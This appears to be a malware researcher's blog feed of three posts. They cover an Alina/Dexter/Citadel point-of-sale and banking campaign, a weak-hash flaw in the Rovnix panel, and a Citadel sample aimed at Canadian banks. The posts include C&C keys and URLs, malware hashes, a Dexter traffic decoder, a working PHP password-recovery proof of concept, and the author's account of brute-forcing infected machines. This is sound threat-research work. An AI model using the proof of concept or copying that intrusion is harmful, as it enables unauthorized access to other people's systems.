I previously made an article about Dexter, noticing how offline bot are using red color in both bots.
There are more similarities, online bots are green , download & execute, update bot, all are common in both Alina and Dexter.
Even the filter, to filter out the track2 from the logs is similar.

On this server, at first everything started from kernelmode.info i was looking to expand my ram scrappers collection.
So i've set some rules on various ram scrapper and i've found Alina like that.
Later i've found one server alive and found installed Citadel, Alina and Dexter, who was potentially dice's server.
Since both Alina and Dexter contain debug information.
And about the server... he come from "off-sho.re" i don't think i need to talk about his previous exploits.
We start to have some nice people here... :)

Latest Alina version, v6.x (even if there is no real change between the 5.x and 6.x) contains the following debug info : "C:\Users\dice\Desktop\src\grab\Debug\alina_dex.pdb"
Also seen for deputat.

Let's have a look on these Alina panels, here are the 'logs':

Settings:

Stats:

More panels:

Some track2:

Alina structure is very simple:
 Procedure of cards verification:

Now for Citadel, here are some screens of the C&Cs:

For a total of 27025807 reports and 35974 bots just for Citadel
Dexter v1 and v2: 8350 bots
Alina all versions: 2159 bots
Total: 46k
And this without Pony and some other additionals crimeware such as Power Loader v2
These kits was here but not really used, so let's skip about them.
(folder /pnb/ for pony and /postnuke/ for PW)
The screenshots of my Power Loader v2 article come also from this server if you wonder. 

Interesting also: the Citadel key used in these panels wasn't from the Citab builder.
And i've found myself as a botnet ID on one of these C&C (lol?).

/armani/:
Botnet ID: alfabeta, axlogax, brand_new, haha, LLLLL, logmein, menu, menu2, omega, POS, text_corn, u, update, we_we_we, xyl)
Key: 4FB85153B10262ECF5028F67AD1F9B00
Login key: 20038735198F82BC8495A2C1B01A9210
/carfca/:
Botnet ID: rf
Key: 94D3A279A412235D0360525484067CF1
Login key: 20038735198F82BC8495A2C1B01A9210
/coconut/:
Botnet ID: n/a
Key: D83F6D1EAAB24EC38883D1CC68C5F49A
Login key: 20038735198F82BC8495A2C1B01A9210
/justme/:
Botnet ID: just
Key: B143D3D208CF08B4835B37C27BAF8FCD
Login key: 20038735198F82BC8495A2C1B01A9210
/pmserver/:
Botnet ID: n/a
Key: 0FBDED178A0F7C7D371E0C3F8826C309
Login key: 20038735198F82BC8495A2C1B01A9210
/supernew/:
Botnet ID: xxaaxxaaxx, canadas
Key: D83F6D1EAAB24EC38883D1CC68C5F49A
Login key: 20038735198F82BC8495A2C1B01A9210
/uae/:
Botnet ID: test
Key: 92B00C09C2301FB465FD688DE179C2E9
Login key: 20038735198F82BC8495A2C1B01A9210

John Doe 15 according to Microsoft:

As you can see, the panel inside the folder /armani/ have a Botnet ID 'POS' and many other relations with the operating botnets that Microsoft identified.
Bad guys behind was Pushing Dexter and Alina with Citadel scripts, Citadel was pushed via Exploit Kit.
And for the PoS machines infected, they probably bought them on the black market.. no idea.
The citadel panels was well organised, each groups got different payloads in function of the country and machine.
Malware was various and downloaded from compromissed sites like:
http://vxvault.siri-urz.net/ViriList.php?MD5=1EFEB85C8EC2C07DC0517CCCA7E8D743
http://vxvault.siri-urz.net/ViriList.php?MD5=133B384F0A4D66809815BAD06AA47AE4

These MD5 are know and was found on compromissed servers/used as citadel script:
133B384F0A4D66809815BAD06AA47AE4
7AAFCD134198CBEFBB5B20D6B926F5C4
A418410FA8B2617F3109DC289FA151C5 > Alina v5.5
CB625454CE2EE0F97E65D1F2DD06BC79 > Alina v5.5
57BEB794C8887EC7FCF1FDCEB246CDD5 > Dexter
907A1EA5D6C662B8493EF80F3844406D
FC5D9565F22310273CC864529DEFB3BC
8FC5D179B1D89C05617F6E296134C629 > Dexter
BAE7CB3CDB8E61A2DE141A971E74E29D
AE3E36133C94453B3FDB1EA098F85127
C428BE2DF49E6F5B4F2C424AB12659F7
BB0B17C2F66A868CF1E8A46626366A32 > Dexter
54D4C90E4E957BBF4DA438870243CCF5

For the Botnet ID 'xyl' only two bots was inside, and i wasn't one of them :)
That happen sometime, bad guys use my nick for their malware configurations, they have probably a problem of inspiration. (or simply due to the noise i made after that i've found one of their sample ?)

Nowaday a small amount of bots are still calling the sinkholes, almost all infected systems call with 'Alina' referrers.
From sinkhole logs, bots call mostly from Canada, this country was the main target in this campaign.
Citadel webinjects was targeting BMO (Bank of Montreal) and even some corporates specialized in Point-Of-Sales like Moneris.

How this campaign ended ?
The bad guys behind have put the emergency brake when Microsoft released the lawsuit against Citadel  users (botnetlegalnotice.com)Domains of Alina got sinkholed, and the server who was accesible from IP have gone few weeks after. (box got formatted)
And no more new citadel build related to this login key, new Alina infection appeared after that.

Dexter and Alina package was found for sale months after probably to erase traces.
It's also for that these day we can see some new Dexter and Alina activities, people are reselling it.
For Dexter, the last botnet i've spotted was hosted on 62.76.44.111
The C&C files was exactly the same as the Alina+Dexter+Citadel campaign.
By exactly the same i mean some 'test files' totaly unrelated to Dexter that i've found on the old campaign was also present in this server.
Made me think that bad guys have sold the content of the server in speed.

Here are some screenshots, the version used here is also 'StarDust' (like in the campaign):
4946 Dumps.

Some panels was very interesting like this one, who have a version 'Millenium':
Interesting even with infected systems:
Username: Manage_ATM
Computer name: DIEBOLD-B79E854

This machine have dumps obviously:

There is also weird process running according to the logs...
Did they infected an ATM ? seem.

Installing a VNC backdoor:
 
The machine is running a process of ATMeye.iQ.
From what i've see, it's a video/fraud surveillance system for ATM.
I have no idea if this application was used by the bad guys to try to get PINs, but seem he was interested into archive video of the ATM surveillance:

The bad guys uploaded/deleted some stuff via ftp:

Deleting logs:

Trying to shutdown the ATM after erasing traces ?

Another panel, less dumps:

/base1/ use the same db as /b2/:

Panel fucked-up:

Another panel:

The guys have downloaded and uploaded on these infected machines several files like passwords cracker, networks scanner, and cards scanner.
Want some math too for this Dexter panel ?
21138 Credit Card Dumps stolen.

From the server, a zbot panel was also here according to the sql db but empty: no reports, no bots.

Crazy stuff anyway, how did they managed to get inside these PoS ?
And the answer is...: weak VNC/RDP passwords as usual.
For the Diebold ATM i've still no idea, i've scanned the IP but no remote service are open.

 "1234" lol seriously... guys...

Same lame password on RDP protocol:

I've brute forced those infected systems to retrieve myself the malware, here are some hashs:
5149313A6C43EB5197C39CC28DE02039
087EE6DD7F15985033119D397E9DAD0A
62809FA40972073C1EB0B41EB589E467
7D419CD096FEC8BCF945E00E70A9BC41
C3A3D3CEDFCA895BBAB07919B2AED7B5Old server:
140D24AF0C2B3A18529DF12DFBC5F6DE

If Visa warn almost everytime merchants in their "data security bulletins" about weak passwords there is a reason.

You are looking for a Dexter decoder ? it's the good place.

if(isset($_POST['query'])&&!is_array($_POST['query'])&&$_POST['query']!=null){
$query=$_POST['query'];

if(strstr($query,'&')!==false){
$vars=explode('&',$query);
$data=array();

foreach($varsas$var){
if(strstr($var,'=')!==false){
$_=explode('=',$var,2);

if(ctype_alpha($_[0])&&ctype_alnum(str_replace('=','',$_[1]))){
$data[$_[0]]=$_[1];
}
}
}

if(!isset($data['val']))
echo('Cannot get the encryption key...');
else{
$key=base64_decode($data['val']);

echo('Encryption key: '.htmlentities($key).' - ');

echo('UID: '.((!isset($data['page'])) ? 'Cannot get UID...': DecodeDecrypt($data['page'],$key)).' - ');
echo('Username: '.((!isset($data['unm'])) ? 'Cannot get Username...': DecodeDecrypt($data['unm'],$key)).' - ');
echo('Computer: '.((!isset($data['cnm'])) ? 'Cannot get Computer...': DecodeDecrypt($data['cnm'],$key)).' - ');
echo('OS: '.((!isset($data['query'])) ? 'Cannot get OS...': DecodeDecrypt($data['query'],$key)).' - ');
echo('Arch: '.((!isset($data['spec'])) ? 'Cannot get Arch...': DecodeDecrypt($data['spec'],$key)).' - ');
echo('Idle: '.((!isset($data['opt'])) ? 'Cannot get Idle...': DecodeDecrypt($data['opt'],$key)).' - ');
echo('Version: '.((!isset($data['var'])) ? 'Cannot get Version...': DecodeDecrypt($data['var'],$key)).' - ');
echo('IP: '.((!isset($data['ip'])) ? 'Cannot get IP...': DecodeDecrypt($data['view'],$key)).' - ');
echo('Keylog: '.((!isset($data['ks'])) ? 'Cannot get Keylog...': DecodeDecrypt($data['ks'],$key)).' - ');
echo('Dump: '.((!isset($data['ump'])) ? 'Cannot get Dump...': DecodeDecrypt($data['ump'],$key)).' - ');
}
}
}
?>

function _xor($src,$key){
for($i=0;$i<strlen($src);$i++)
for($x=0;$x<strlen($key);$x++)
$src{$i}=$src{$i} ^ $key{$x};

return$src;
}

function DecodeDecrypt($src,$key){
$src=base64_decode($src);
$dest= _xor($src,$key);

return$dest;
}
?>

That was for Dexter, now about Alina yes they still use it and even more clumsily like for Dexter people try to sell it.
Reported here by exitthematrix, i've saw the sale thread too before an admin removed it for 'fraud' (the guys was selling even passports) but i've not took a screenshot thinking it was not serious.

Alina 5.3 source code:

Track2 scanner proc in Alina:


This Alina + Dexter + Citadel was probably disastrous for alot of people, i even received mails from merchants who told me that they got infected and this when the campaign was still running.
Combining the cream of RAM Scrapers with banking trojans can make a lot of damage.
Microsoft reacted with a good timing and have destroyed a lot of campaigns.

Reversible Rovnix passwords

$
0
0
I got my hands on Rovnix recently.
Not the one who got leaked with Carberp but the 'ISFB' package part (Core, Interceptor, ATS, VNC modules, etc...):

And the panel..
Who ask for mod_rewrite for an unknown reason (ok the htaccess, but is it really usefull here?)

I've already took some screenshots of inside Rovnix, so let's skip about the screenshots part.
Just check this article if you want see pics from the Rovnix C&C:
http://www.xylibox.com/2012/02/win32rovnix.html?spref=tw

The panel come with a sql dump, and a user/password is already defined inside.
The password look's like a MD5 hash and we know nothing about it.

SQL tables:

By looking the hash on Google we have a correspondence with '21240':

A tool confirm also that the hash is good for '21240'

But.. there is a problem somewhere:

So we have to check the code to see what's going on.

admin/index.php use a function getMyHash()

This small function can be found inside mod/main.php:

We have a salt and they use md5() but we have a huge mistake here:
'+' instead of '.' everywhere.
So if we try to hash a password composed only of numbers, we will have a obvious problem.
Like it's the case for the 'default password' found inside the sql dump.

If you want an example:
310dcbbf4cce62f762a2aaa148d556bd = getMyHash('123')
310dcbbf4cce62f762a2aaa148d556bd = md5('333')
'collision' with 2 algo.

We can obtain the password from the hash easily, PoC:
<?php
        /**
         * Defeat the weak hash function of Rovnix
         * to get password from a hash.
         */

     
        $HASH  ='fbff791ef0770855e599ea6f87d41653';
     
        $value = getNumber($HASH);
        $search= search($value,$HASH);
     
        echo('Hash:   '.$HASH .'<br />');
        echo('Value:  '.$value.'<br />');
        echo('Search: '.$search);
     
        // Search an working (number) password
        function search($value,$hash){
                $i=0;
             
                while(true){
                        if(getHash($i)==$value)
                                return$i;
                     
                        $i++;
                }
        }
     
        // Get the hashed number
        function getNumber($hash){
                $i=0;
             
                while(true){
                        if(md5($i)==$hash)
                                return$i;
                     
                        $i++;
                }
        }
     
        // Hash function without final MD5 (return only numbers)
        function getHash($hash){
                $salt='LKJFDJLJkkljKJKJKJkjkj$i%&@(%jkjJn@@j$r@!cdh*!@#$djl1J$r!j@o*$@duJxlJLEKJkJFKJEJ2$jkeJFJLEJFE';
             
                return$hash+$salt+md5($salt)+md5($hash)+$salt[3];
        }
?>

Output for the unknown hash:

So the unknown password for fbff791ef0770855e599ea6f87d41653 is in reality '21173'.
Let's try..
Excellent, we can't log with '21240' because it will be sent to getMyHash() but it's interesting to see this type of bug and how a bad algorithm implementation can cause a security problem.

Citadel targeting Canada

$
0
0

A Citadel domain appeared yesterday on the Zeus tracker:
inforick, i thought this domain was done to annoy Rick of MalwareMustDie but seem not related.

A friend (Kafeine) have found this binary, it was loaded via Impact Exploit Kit.
The Citadel domain 'inforick.com' seem hijacked, there is no trace of C&C on this server, just a gate.php who act as redirector on another domain.

Citadel binary is FUD.

when unpacked, config details:
Drop: hxtp://inforick.com/img/gate.php
Infection: hxtp://inforick.com/zip/file.php|file=soft.exe
Update: hxtp://hostname1.tilder77.tk/sham11/file.php
Update: hxtp://sipginues.com/status/file.php|file=config.bin
Hard config: hxtp://inforick.com/img/file.php|file=config.dll
Key: 82 75 FC 56 7F D5 E6 A0 F3 B6 61 18 4B C8 B1 41
Login key: C1F20D2340B519056A7D89B7DF4B0FFF

This Citadel is targeting Canadian banks, more specificaly: Canadian Imperial Bank of Commerce, Scotiabank, Bank of Montreal and Toronto-Dominion Bank.

A MiTB panel was found inside the config:


The first one is on empressbridge.com, this server seem hijacked too.

Login:

Intercept:

Add commands:

Commands:

Edit:

Jabber:

Change password:


Second panel, hosted on aussieconnect.net
This one is SSL valid.

Log:

Details:

First time i see this panel i have no idea of who sell it.
About inforick.com, this domain is now nuked.
Viewing all 128 articles
Browse latest View live


Latest Images